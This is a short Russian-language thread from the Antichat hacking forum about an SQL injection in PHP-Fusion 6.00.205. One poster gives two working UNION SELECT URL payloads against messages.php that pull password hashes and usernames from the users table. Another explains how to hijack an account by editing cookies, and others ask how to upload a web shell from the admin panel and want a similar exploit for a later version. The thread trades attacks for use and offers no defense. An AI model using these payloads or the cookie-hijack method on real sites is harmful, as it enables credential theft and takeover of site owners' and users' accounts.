Форум АНТИЧАТ - php-fusion 6.00.205 sql-injection

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - php-fusion 6.00.205 sql-injection (https://forum.antichat.xyz/showthread.php?t=11164)

sn0w	27.11.2005 23:31

php-fusion 6.00.205 sql-injection

Прежде всего спасибо ZaCo (xaxa3217) - sql нашел именно он!))) а сайт - я))) . По мере того как линки будут умирать (webfile.ru)) я добавлю новые. Кстати ZaCo гдето запостил сам sql запрос. вот. поэтому не буду повторять. Итак видео щас тут: webfile.ru/657729

k1b0rg

28.11.2005 00:05

выложи сплойт

africanec

28.11.2005 00:10

смори грин мишка создавал тему непомню как называеться

sn0w	28.11.2005 00:12

мд5 хэши
/messages.php?folder=inbox&show='%20union%20select% 201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

имена
/messages.php?folder=inbox&show='%20union%20select% 201,1,1,user_name,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

надо быть залогиненным

GreenBear

28.11.2005 14:57

Достаточно было взять хешку и подредактировать куки.. даже имя пользователя знать не надо, просто в куках меняеш айди. эт я про видео.

ilyha

07.12.2005 00:47

А шелл, как в него залить из админки?

sn0w	23.12.2005 16:44

шелл я не заливал, но попробуй качнуть к примеру из полученной админки

Blacksmith

12.05.2008 18:33

Есть подобный скуль для версии PHP-Fusion 6.01.3.01 ?

Время: 14:27